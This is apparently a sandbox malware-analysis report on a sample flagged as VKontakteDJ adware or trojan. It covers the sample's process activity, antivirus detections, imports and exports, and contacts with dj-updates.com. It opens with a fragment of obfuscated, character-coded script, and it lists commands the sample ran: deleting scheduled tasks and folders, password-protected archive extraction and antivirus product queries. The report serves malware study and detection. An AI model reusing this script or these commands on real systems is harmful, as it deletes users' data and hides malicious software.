S73S84S69S67S84S85S82S69S39S41S46S105S110S100S101S120S79S102S40S39S54S52S39S41S32S33S61S32S45S49S41S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S125S101S108S115S101S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S51S50S59S125S32S32S32S32S111S67S116S120S46S65S100S100S40S39S95S95S80S114S111S118S105S100S101S114S65S114S99S104S105S116S101S99S116S117S114S101S39S44S32S65S114S99S104S105S116S101S99S116S117S114S101S41S59S32S32S32S32S118S97S114S32S111S76S111S99S97S116S111S114S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S76S111S99S97S116S111S114S39S41S59S32S32S32S32S118S97S114S32S111S87S77S73S32S61S32S111S76S111S99S97S116S111S114S46S67S111S110S110S101S99S116S83S101S114S118S101S114S40S39S39S44S32S39S114S111S111S116S92S92S100S101S102S97S117S108S116S39S44S32S39S39S44S32S39S39S44S32S39S39S44S32S39S39S44S32S48S44S32S111S67S116S120S41S59S32S32S32S32S118S97S114S32S111S82S101S103S32S61S32S111S87S77S73S46S71S101S116S40S39S83S116S100S82S101S103S80S114S111S118S39S41S59S32S32S32S32S118S97S114S32S111S73S110S80S97S114S97S109S115S32S61S32S111S82S101S103S46S77S101S116S104S111S100S115S95S40S39S71S101S116S83S116S114S105S110S103S86S97S108S117S101S39S41S46S73S110S112S97S114S97S109S101S116S101S114S115S59S32S32S32S32S111S73S110S80S97S114S97S109S115S46S72S100S101S102S107S101S121S32S61S32S82S111S111S116S75S101S121S59S32S32S32S32S111S73S110S80S97S114S97S109S115S46S83S115S117S98S107S101S121S110S97S109S101S32S61S32S75S101S121S78S97S109S101S59S32S32S32S32S111S73S110S80S97S114S97S109S115S46S83S118S97S108S117S101S110S97S109S101S32S61S32S86S97S108S117S101S78S97S109S101S59S32S32S32S32S118S97S114S32S111S79S117S116S80S97S114S97S109S115S32S61S32S111S82S101S103S46S69S120S101S99S77S101S116S104S111S100S95S40S39S71S101S116S83S116S114S105S110S103S86S97S108S117S101S39S44S32S111S73S110S80S97S114S97S109S115S44S32S48S44S32S111S67S116S120S41S59S32S32S32S32S114S101S116S117S114S110S32S111S79S117S116S80S97S114S97S109S115S46S83S86S97S108S117S101S59S125S100S101S108S70S105S108S101S115S73S110S70S111S108S100S101S114S40S39S67S58S92S92S80S114S111S103S114S97S109S68S97S116S97S92S92S86S75S95S68S74S39S41S59S118S97S114S32S110S101S116S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S83S99S114S105S112S116S46S78S101S116S119S111S114S107S39S41S59S118S97S114S32S102S115S111S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S83S99S114S105S112S116S105S110S103S46S70S105S108S101S83S121S115S116S101S109S79S98S106S101S99S116S39S41S59S116S114S121S123S102S115S111S46S68S101S108S101S116S101S70S105S108S101S40S39S67S58S92S92S85S115S101S114S115S92S92S39S43S110S101S116S46S85S115S101S114S78S97S109S101S43S39S92S92S68S101S115S107S116S111S112S92S92S86S107S95S68S74S46S108S110S107S39S41S59S125S99S97S116S99S104S40S101S41S123S125S105S102S40S102S115S111S46S70S111S108S100S101S114S69S120S105S115S116S115S40S39S67S58S92S92S80S114S111S103S114S97S109S68S97S116S97S92S92S77S105S99S114S111S115S111S102S116S92S92S87S105S110S100S111S119S115S92S92S83S116S97S114S116S32S77S101S110S117S92S92S80S114S111S103S114S97S109S115S92S92S86S75S95S68S74S39S41S32S61S61S32S116S114S117S101S41S123S116S114S121S123S102S115S111S46S68S101S108S101S116S101S70S111S108S100S101S114S40S39S67S58S92S92S80S114S111S103S114S97S109S68S97S116S97S92S92S77S105S99S114S111S115S111S102S116S92S92S87S105S110S100S111S119S115S92S92S83S116S97S114S116S32S77S101S110S117S92S92S80S114S111S103S114S97S109S115S92S92S86S75S95S68S74S39S41S59S125S99S97S116S99S104S40S101S41S123S125S125S118S97S114S32S115S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S83S99S114S105S112S116S46S83S104S101S108S108S39S41S59S115S46S82S117S110S40S39S83S67S72S84S65S83S75S83S32S47S68S101S108S101S116S101S32S47S84S78S32S86S75S95S68S74S32S47S70S39S44S48S44S48S41S59S118S97S114S32S97S114S114S32S61S32S69S110S117S109S82S101S103S75S101S121S115S40S48S120S56S48S48S48S48S48S48S50S44S39S83S79S70S84S87S65S82S69S92S92S87S111S119S54S52S51S50S78S111S100S101S92S92S77S105S99S114S111S115S111S102S116S92S92S87S105S110S100S111S119S115S92S92S67S117S114S114S101S110S116S86S101S114S115S105S111S110S92S92S85S110S105S110S115S116S97S108S108S39S41S59S102S111S114S40S118S97S114S32S105S32S61S48S59S105S32S60S32S97S114S114S46S108S101S110S103S116S104S59S105S43S43S41S123S118S97S114S32S118S97S108S117S101S32S61S32S39S39S59S116S114S121S123S118S97S108S117S101S32S61S32S82S101S97S100S82S101S103S83S116S114S40S48S120S56S48S48S48S48S48S48S50S44S39S83S79S70S84S87S65S82S69S92S92S87S111S119S54S52S51S50S78S111S100S101S92S92S77S105S99S114S111S115S111S102S116S92S92S87S105S110S100S111S119S115S92S92S67S117S114S114S101S110S116S86S101S114S115S105S111S110S92S92S85S110S105S110S115S116S97S108S108S92S92S39S32S43S32S97S114S114S91S105S93S44S39S68S105S115S112S108S97S121S78S97S109S101S39S41S59S125S99S97S116S99S104S40S101S41S123S125S105S102S40S118S97S108S117S101S32S61S61S32S39S86S107S95S68S74S39S41S123S116S114S121S123S114S101S103S68S101S108S40S48S120S56S48S48S48S48S48S48S50S44S39S83S79S70S84S87S65S82S69S92S92S87S111S119S54S52S51S50S78S111S100S101S92S92S77S105S99S114S111S115S111S102S116S92S92S87S105S110S100S111S119S115S92S92S67S117S114S114S101S110S116S86S101S114S115S105S111S110S92S92S85S110S105S110S115S116S97S108S108S92S92S39S32S43S32S97S114S114S91S105S93S41S59S125S99S97S116S99S104S40S101S41S123S125S125S125S125S99S97S116S99S104S40S101S114S114S41S123S101S114S114S46S100S101S115S99S114S105S112S116S105S111S110S59S125S
regkey_r: dataIn
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\VKDJ\dataIn
success 0 0
Executes one or more WMI queries (3 个事件)
wmi select * from AntiVirusProduct
wmi select * from Win32_Process
wmi select * from Win32_OperatingSystem
One or more non-safelisted processes were created (8 个事件)
parent_process wscript.exe martian_process "C:\Windows\System32\schtasks.exe" /Delete /TN VK_DJ /F
parent_process wscript.exe martian_process SCHTASKS /Delete /TN VK_DJ /F
parent_process wscript.exe martian_process C:\ProgramData\duwud\7za.exe e C:\ProgramData\s111yt.zip -pvkd -y -oC:\ProgramData\kx2m59
parent_process wscript.exe martian_process cmd /c rd /S/Q C:\ProgramData\kx2m59
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c move /Y "C:\ProgramData\kx2m59" "C:\ProgramData\VkontakteDJ"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c rd /S/Q C:\ProgramData\kx2m59
parent_process wscript.exe martian_process "C:\ProgramData\duwud\7za.exe" e C:\ProgramData\s111yt.zip -pvkd -y -oC:\ProgramData\kx2m59
parent_process wscript.exe martian_process cmd.exe /c move /Y "C:\ProgramData\kx2m59" "C:\ProgramData\VkontakteDJ"
File has been identified by 39 AntiVirus engines on VirusTotal as malicious (39 个事件)
DrWeb Program.VKontakteDJ.95
MicroWorld-eScan Gen:Variant.Ulise.98438
FireEye Generic.mg.584a90a46491964a
CAT-QuickHeal PUA.MediadrugPMF.S11139230
McAfee GenericRXJS-EQ!584A90A46491
Zillya Trojan.Agent.JS.5208
K7AntiVirus Trojan ( 0055d9fb1 )
K7GW Trojan ( 0055d9fb1 )
Arcabit Trojan.Ulise.D18086
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of JS/Agent.OHD
Avast Win32:PUPX-gen [PUP]
Kaspersky not-a-virus:HEUR:AdWare.Win32.VKDJ.pef
BitDefender Gen:Variant.Ulise.98438
NANO-Antivirus Riskware.Win32.VKDJ.hedrra
Rising Trojan.Agent!8.B1E (RDMK:cmRtazpH3U5+9T5XckSGLxKpJedX)
Endgame malicious (high confidence)
F-Secure Heuristic.HEUR/AGEN.1125968
McAfee-GW-Edition BehavesLike.Win32.Dropper.tc
Emsisoft Gen:Variant.Ulise.98438 (B)
Ikarus Trojan.JS.Agent
Jiangmin AdWare.VKDJ.qy
Webroot W32.Trojan.Gen
Avira HEUR/AGEN.1125968
MAX malware (ai score=88)
Antiy-AVL GrayWare/Win32.VKontakte.dj
Microsoft Trojan:Win32/Wacatac.D!ml
ZoneAlarm not-a-virus:HEUR:AdWare.Win32.VKDJ.pef
GData Gen:Variant.Ulise.98438
AhnLab-V3 PUP/Win32.Helper.R325967
Acronis suspicious
VBA32 BScope.Adware.VKDJ
ALYac Gen:Variant.Ulise.98438
Ad-Aware Gen:Variant.Ulise.98438
Malwarebytes PUP.Optional.VkontakteDJ
APEX Malicious
Fortinet W32/VKontakte.DJ!tr
AVG Win32:PUPX-gen [PUP]
Panda Trj/Genetic.gen
The process wscript.exe wrote an executable file to disk which it then attempted to execute (4 个事件)
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\cmd.exe
file C:\ProgramData\duwud\7za.exe
file C:\Windows\System32\schtasks.exe
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 个事件)
dead_host 172.217.24.14:443
dead_host 172.217.160.78:443
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-04-13 22:05:15

Imports

Library ADVAPI32.DLL:
0x607188 RegCloseKey
0x60718c RegConnectRegistryW
0x607190 RegCreateKeyExW
0x607194 RegDeleteKeyW
0x607198 RegDeleteValueW
0x60719c RegEnumKeyExW
0x6071a0 RegEnumValueW
0x6071a4 RegFlushKey
0x6071a8 RegLoadKeyW
0x6071ac RegOpenKeyExW
0x6071b0 RegQueryInfoKeyW
0x6071b4 RegQueryValueExW
0x6071b8 RegReplaceKeyW
0x6071bc RegRestoreKeyW
0x6071c0 RegSaveKeyW
0x6071c4 RegSetValueExW
0x6071c8 RegUnLoadKeyW
Library KERNEL32.DLL:
0x6073f4 CloseHandle
0x6073f8 CompareStringW
0x6073fc CreateEventW
0x607400 CreateFileA
0x607404 CreateFileMappingA
0x607408 CreateFileW
0x60740c CreateThread
0x607414 DeleteFileA
0x607418 DeleteFileW
0x607420 EnumCalendarInfoW
0x607424 EnumSystemLocalesW
0x607428 ExitProcess
0x60742c ExitThread
0x607430 FindClose
0x607434 FindFirstFileW
0x607438 FindResourceW
0x60743c FormatMessageW
0x607440 FreeLibrary
0x607444 FreeResource
0x607448 GetACP
0x60744c GetCPInfo
0x607450 GetCPInfoExW
0x607454 GetCommandLineA
0x607458 GetCommandLineW
0x60745c GetCurrentProcess
0x607460 GetCurrentProcessId
0x607464 GetCurrentThread
0x607468 GetCurrentThreadId
0x60746c GetDateFormatW
0x607470 GetDiskFreeSpaceW
0x607478 GetExitCodeThread
0x60747c GetFileAttributesA
0x607480 GetFileAttributesW
0x607484 GetFileType
0x607488 GetFullPathNameW
0x60748c GetLastError
0x607490 GetLocalTime
0x607494 GetLocaleInfoA
0x607498 GetLocaleInfoW
0x60749c GetModuleFileNameA
0x6074a0 GetModuleFileNameW
0x6074a4 GetModuleHandleA
0x6074a8 GetModuleHandleW
0x6074ac GetOEMCP
0x6074b0 GetProcAddress
0x6074b4 GetProcessHeap
0x6074b8 GetStartupInfoA
0x6074bc GetStdHandle
0x6074c0 GetStringTypeA
0x6074c4 GetStringTypeW
0x6074d0 GetSystemInfo
0x6074d4 GetThreadLocale
0x6074d8 GetThreadPriority
0x6074dc GetTickCount
0x6074e4 GetUserDefaultLCID
0x6074ec GetVersion
0x6074f0 GetVersionExA
0x6074f4 GetVersionExW
0x6074f8 GlobalAddAtomW
0x6074fc GlobalAlloc
0x607500 GlobalDeleteAtom
0x607504 GlobalFindAtomW
0x607508 GlobalFree
0x60750c GlobalLock
0x607510 GlobalUnlock
0x607514 HeapAlloc
0x607518 HeapFree
0x607528 InterlockedExchange
0x607534 IsDBCSLeadByteEx
0x607538 IsDebuggerPresent
0x60753c IsValidLocale
0x607540 LCMapStringA
0x607548 LoadLibraryA
0x60754c LoadLibraryExW
0x607550 LoadLibraryW
0x607554 LoadResource
0x607558 LocalAlloc
0x60755c LocalFree
0x607560 LockResource
0x607564 MapViewOfFile
0x607568 MoveFileW
0x60756c MulDiv
0x607570 MultiByteToWideChar
0x607574 OpenFileMappingA
0x60757c RaiseException
0x607580 ReadFile
0x607584 RemoveDirectoryW
0x607588 ResetEvent
0x60758c ResumeThread
0x607590 RtlUnwind
0x607598 SetEndOfFile
0x60759c SetErrorMode
0x6075a0 SetEvent
0x6075a4 SetFilePointer
0x6075a8 SetHandleCount
0x6075ac SetLastError
0x6075b0 SetThreadLocale
0x6075b4 SetThreadPriority
0x6075b8 SizeofResource
0x6075bc Sleep
0x6075c0 SuspendThread
0x6075c4 SwitchToThread
0x6075c8 TlsAlloc
0x6075cc TlsFree
0x6075d0 TlsGetValue
0x6075d4 TlsSetValue
0x6075e0 UnmapViewOfFile
0x6075e4 VirtualAlloc
0x6075e8 VirtualFree
0x6075ec VirtualQuery
0x6075f0 VirtualQueryEx
0x6075f8 WaitForSingleObject
0x6075fc WideCharToMultiByte
0x607600 WinExec
0x607604 WriteFile
0x607608 lstrcmpiA
0x60760c lstrcpynW
0x607610 lstrlenW
Library VERSION.DLL:
0x60762c GetFileVersionInfoW
0x607630 VerQueryValueW
Library WSOCK32.DLL:
0x607660 WSACleanup
0x607664 WSAStartup
0x607668 closesocket
0x60766c connect
0x607670 gethostbyname
0x607674 htons
0x607678 recv
0x60767c send
0x607680 socket
Library WINSPOOL.DRV:
0x6076a0 ClosePrinter
0x6076a4 DocumentPropertiesW
0x6076a8 EnumPrintersW
0x6076ac
0x6076b0 OpenPrinterW
Library COMCTL32.DLL:
0x607750 FlatSB_GetScrollPos
0x607758 FlatSB_SetScrollPos
0x607760 ImageList_Add
0x607764 ImageList_BeginDrag
0x607768 ImageList_Copy
0x60776c ImageList_Create
0x607770 ImageList_Destroy
0x607774 ImageList_DragEnter
0x607778 ImageList_DragLeave
0x60777c ImageList_DragMove
0x607784 ImageList_Draw
0x607788 ImageList_DrawEx
0x60778c ImageList_EndDrag
0x607798 ImageList_GetIcon
0x6077ac ImageList_Read
0x6077b0 ImageList_Remove
0x6077b4 ImageList_Replace
0x6077cc ImageList_Write
0x6077d0
0x6077d4 InitializeFlatSB
0x6077d8 _TrackMouseEvent
Library GDI32.DLL:
0x607960 AbortDoc
0x607964 AngleArc
0x607968 Arc
0x60796c ArcTo
0x607970 BitBlt
0x607974 Chord
0x607978 CopyEnhMetaFileW
0x60797c CreateBitmap
0x607980 CreateBrushIndirect
0x607988 CreateCompatibleDC
0x60798c CreateDCW
0x607990 CreateDIBSection
0x607994 CreateDIBitmap
0x607998 CreateFontIndirectW
0x6079a0 CreateICW
0x6079a4 CreatePalette
0x6079a8 CreatePenIndirect
0x6079ac CreateRectRgn
0x6079b0 CreateSolidBrush
0x6079b4 DeleteDC
0x6079b8 DeleteEnhMetaFile
0x6079bc DeleteObject
0x6079c0 Ellipse
0x6079c4 EndDoc
0x6079c8 EndPage
0x6079cc EnumFontFamiliesExW
0x6079d0 EnumFontsW
0x6079d4 ExcludeClipRect
0x6079d8 ExtFloodFill
0x6079dc ExtTextOutW
0x6079e0 FrameRgn
0x6079e4 GdiFlush
0x6079e8 GetBitmapBits
0x6079ec GetBrushOrgEx
0x6079f0 GetClipBox
0x6079f8 GetDIBColorTable
0x6079fc GetDIBits
0x607a00 GetDeviceCaps
0x607a04 GetEnhMetaFileBits
0x607a18 GetObjectW
0x607a1c GetPaletteEntries
0x607a20 GetPixel
0x607a24 GetRgnBox
0x607a28 GetStockObject
0x607a34 GetTextMetricsW
0x607a38 GetWinMetaFileBits
0x607a3c GetWindowOrgEx
0x607a40 IntersectClipRect
0x607a44 LineTo
0x607a48 MaskBlt
0x607a4c MoveToEx
0x607a50 PatBlt
0x607a54 Pie
0x607a58 PlayEnhMetaFile
0x607a5c PolyBezier
0x607a60 PolyBezierTo
0x607a64 Polygon
0x607a68 Polyline
0x607a6c RealizePalette
0x607a70 RectVisible
0x607a74 Rectangle
0x607a78 ResizePalette
0x607a7c RestoreDC
0x607a80 RoundRect
0x607a84 SaveDC
0x607a88 SelectObject
0x607a8c SelectPalette
0x607a90 SetAbortProc
0x607a94 SetBkColor
0x607a98 SetBkMode
0x607a9c SetBrushOrgEx
0x607aa0 SetDIBColorTable
0x607aa4 SetDIBits
0x607aa8 SetEnhMetaFileBits
0x607aac SetPixel
0x607ab0 SetROP2
0x607ab4 SetStretchBltMode
0x607ab8 SetTextColor
0x607abc SetViewportOrgEx
0x607ac0 SetWinMetaFileBits
0x607ac4 SetWindowOrgEx
0x607ac8 StartDocW
0x607acc StartPage
0x607ad0 StretchBlt
0x607ad4 StretchDIBits
0x607ad8 UnrealizeObject
Library MSIMG32.DLL:
0x607ae8 AlphaBlend
Library SHELL32.DLL:
0x607af8 ShellExecuteA
Library USER32.DLL:
0x607dc4 AdjustWindowRectEx
0x607dc8 BeginPaint
0x607dcc CallNextHookEx
0x607dd0 CallWindowProcW
0x607dd4 CharLowerBuffW
0x607dd8 CharLowerW
0x607ddc CharNextW
0x607de0 CharUpperW
0x607de4 CheckMenuItem
0x607de8 ClientToScreen
0x607dec CopyIcon
0x607df4 CreateIcon
0x607df8 CreateMenu
0x607dfc CreatePopupMenu
0x607e00 CreateWindowExW
0x607e04 DefFrameProcW
0x607e08 DefMDIChildProcW
0x607e0c DefWindowProcW
0x607e10 DeleteMenu
0x607e14 DestroyCursor
0x607e18 DestroyIcon
0x607e1c DestroyMenu
0x607e20 DestroyWindow
0x607e24 DispatchMessageA
0x607e28 DispatchMessageW
0x607e2c DrawEdge
0x607e30 DrawFocusRect
0x607e34 DrawFrameControl
0x607e38 DrawIcon
0x607e3c DrawIconEx
0x607e40 DrawMenuBar
0x607e44 DrawTextExW
0x607e48 DrawTextW
0x607e4c EnableMenuItem
0x607e50 EnableScrollBar
0x607e54 EnableWindow
0x607e58 EndMenu
0x607e5c EndPaint
0x607e60 EnumChildWindows
0x607e64 EnumDisplayMonitors
0x607e68 EnumThreadWindows
0x607e6c EnumWindows
0x607e70 FillRect
0x607e74 FindWindowExW
0x607e78 FindWindowW
0x607e7c FrameRect
0x607e80 GetActiveWindow
0x607e84 GetCapture
0x607e88 GetClassInfoW
0x607e8c GetClassLongW
0x607e90 GetClientRect
0x607e94 GetClipboardData
0x607e98 GetCursor
0x607e9c GetCursorPos
0x607ea0 GetDC
0x607ea4 GetDCEx
0x607ea8 GetDesktopWindow
0x607eac GetFocus
0x607eb0 GetForegroundWindow
0x607eb4 GetIconInfo
0x607eb8 GetKeyNameTextW
0x607ebc GetKeyState
0x607ec0 GetKeyboardLayout
0x607ecc GetKeyboardState
0x607ed0 GetLastActivePopup
0x607ed4 GetMenu
0x607ed8 GetMenuItemCount
0x607edc GetMenuItemID
0x607ee0 GetMenuItemInfoW
0x607ee4 GetMenuState
0x607ee8 GetMenuStringW
0x607eec GetMessageExtraInfo
0x607ef0 GetMessagePos
0x607ef4 GetMonitorInfoW
0x607ef8 GetParent
0x607efc GetPropW
0x607f00 GetScrollInfo
0x607f04 GetScrollPos
0x607f08 GetScrollRange
0x607f0c GetSubMenu
0x607f10 GetSysColor
0x607f14 GetSysColorBrush
0x607f18 GetSystemMenu
0x607f1c GetSystemMetrics
0x607f20 GetTopWindow
0x607f24 GetWindow
0x607f28 GetWindowDC
0x607f2c GetWindowLongW
0x607f30 GetWindowPlacement
0x607f34 GetWindowRect
0x607f38 GetWindowTextW
0x607f40 InflateRect
0x607f44 InsertMenuItemW
0x607f48 InsertMenuW
0x607f4c InvalidateRect
0x607f50 IsChild
0x607f54 IsDialogMessageA
0x607f58 IsDialogMessageW
0x607f5c IsIconic
0x607f60 IsWindow
0x607f64 IsWindowEnabled
0x607f68 IsWindowUnicode
0x607f6c IsWindowVisible
0x607f70 IsZoomed
0x607f74 KillTimer
0x607f78 LoadBitmapW
0x607f7c LoadCursorW
0x607f80 LoadIconW
0x607f84 LoadKeyboardLayoutW
0x607f88 LoadStringW
0x607f8c MapVirtualKeyW
0x607f90 MapWindowPoints
0x607f94 MessageBoxA
0x607f98 MessageBoxW
0x607f9c MonitorFromPoint
0x607fa0 MonitorFromRect
0x607fa4 MonitorFromWindow
0x607fb0 OffsetRect
0x607fb4 PeekMessageA
0x607fb8 PeekMessageW
0x607fbc PostMessageW
0x607fc0 PostQuitMessage
0x607fc4 RedrawWindow
0x607fc8 RegisterClassW
0x607fd4 ReleaseCapture
0x607fd8 ReleaseDC
0x607fdc RemoveMenu
0x607fe0 RemovePropW
0x607fe4 ScreenToClient
0x607fe8 ScrollWindow
0x607fec SendMessageA
0x607ff0 SendMessageW
0x607ff4 SetActiveWindow
0x607ff8 SetCapture
0x607ffc SetClassLongW
0x608000 SetCursor
0x608004 SetCursorPos
0x608008 SetFocus
0x60800c SetForegroundWindow
0x608010 SetMenu
0x608014 SetMenuItemInfoW
0x608018 SetParent
0x60801c SetPropW
0x608020 SetRect
0x608024 SetScrollInfo
0x608028 SetScrollPos
0x60802c SetScrollRange
0x608030 SetTimer
0x608034 SetWindowLongW
0x608038 SetWindowPlacement
0x60803c SetWindowPos
0x608040 SetWindowTextW
0x608044 SetWindowsHookExW
0x608048 ShowOwnedPopups
0x60804c ShowScrollBar
0x608050 ShowWindow
0x608058 TrackPopupMenu
0x608060 TranslateMessage
0x608064 UnhookWindowsHookEx
0x608068 UnregisterClassW
0x60806c UpdateWindow
0x608070 WaitMessage
0x608074 WindowFromPoint
0x608078 wsprintfA
Library OLE32.DLL:
0x6080a0 CoCreateGuid
0x6080a4 CoCreateInstance
0x6080a8 CoInitialize
0x6080ac CoUninitialize
0x6080b0 IsEqualGUID
0x6080b4 OleInitialize
0x6080b8 OleUninitialize
Library OLEAUT32.DLL:
0x6080f4 GetErrorInfo
0x6080f8 SafeArrayCreate
0x6080fc SafeArrayGetLBound
0x608100 SafeArrayGetUBound
0x608104 SafeArrayPtrOfIndex
0x608108 SysAllocStringLen
0x60810c SysFreeString
0x608110 SysReAllocStringLen
0x608114 VariantChangeType
0x608118 VariantClear
0x60811c VariantCopy
0x608120 VariantInit

Exports

Ordinal Address Name
3 0x43fc04 @@Avast@Finalize
2 0x43fbe4 @@Avast@Initialize
5 0x46f64c @@Filecapture@Finalize
4 0x46f62c @@Filecapture@Initialize
7 0x473e88 @@Gamesform@Finalize
6 0x473e68 @@Gamesform@Initialize
9 0x4773c4 @@Install@Finalize
8 0x4773a4 @@Install@Initialize
11 0x48d2d4 @@Installthread@Finalize
10 0x48d2b4 @@Installthread@Initialize

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49204 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49205 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49200 203.208.40.98 update.googleapis.com 443
192.168.56.101 49203 203.208.41.65 redirector.gvt1.com 80
192.168.56.101 49184 54.36.175.115 dj-updates.com 80
192.168.56.101 49185 54.36.175.115 dj-updates.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53380 114.114.114.114 53
192.168.56.101 54178 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58970 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com

http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=253465646a23305e&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620755296&mv=m&mvi=3
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=253465646a23305e&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620755296&mv=m&mvi=3 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

http://dj-updates.com//client.config/?app=vk_downloader&format=xml&uid=B2785848-06A1-417E-B3B0-0692D6A8C0E8-E2A6769EA3FB4B6D6A1B3FEB3384FF4F&version=1.7.1.153&w_info=cl_downloader&advert_key=ZWMwMDAxMDVhMzAwMTljYzAwMDAxOWJmMDAxOWJmMDAxOWJmZGUwMGM4ODMyNg==
GET //client.config/?app=vk_downloader&format=xml&uid=B2785848-06A1-417E-B3B0-0692D6A8C0E8-E2A6769EA3FB4B6D6A1B3FEB3384FF4F&version=1.7.1.153&w_info=cl_downloader&advert_key=ZWMwMDAxMDVhMzAwMTljYzAwMDAxOWJmMDAxOWJmMDAxOWJmZGUwMGM4ODMyNg== HTTP/1.1
Host: dj-updates.com
Connection: close

http://dj-updates.com//stat.counter/?app=vkdj&c1=cinst_start_Windows%207%20x64_av-clean&advert_key=ZWMwMDAxMDVhMzAwMTljYzAwMDAxOWJmMDAxOWJmMDAxOWJmZGUwMGM4ODMyNg==&uid=
GET //stat.counter/?app=vkdj&c1=cinst_start_Windows%207%20x64_av-clean&advert_key=ZWMwMDAxMDVhMzAwMTljYzAwMDAxOWJmMDAxOWJmMDAxOWJmZGUwMGM4ODMyNg==&uid= HTTP/1.1
Host: dj-updates.com
Connection: close

http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620755296&mv=m&mvi=1&pl=23&shardbypass=yes
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620755296&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.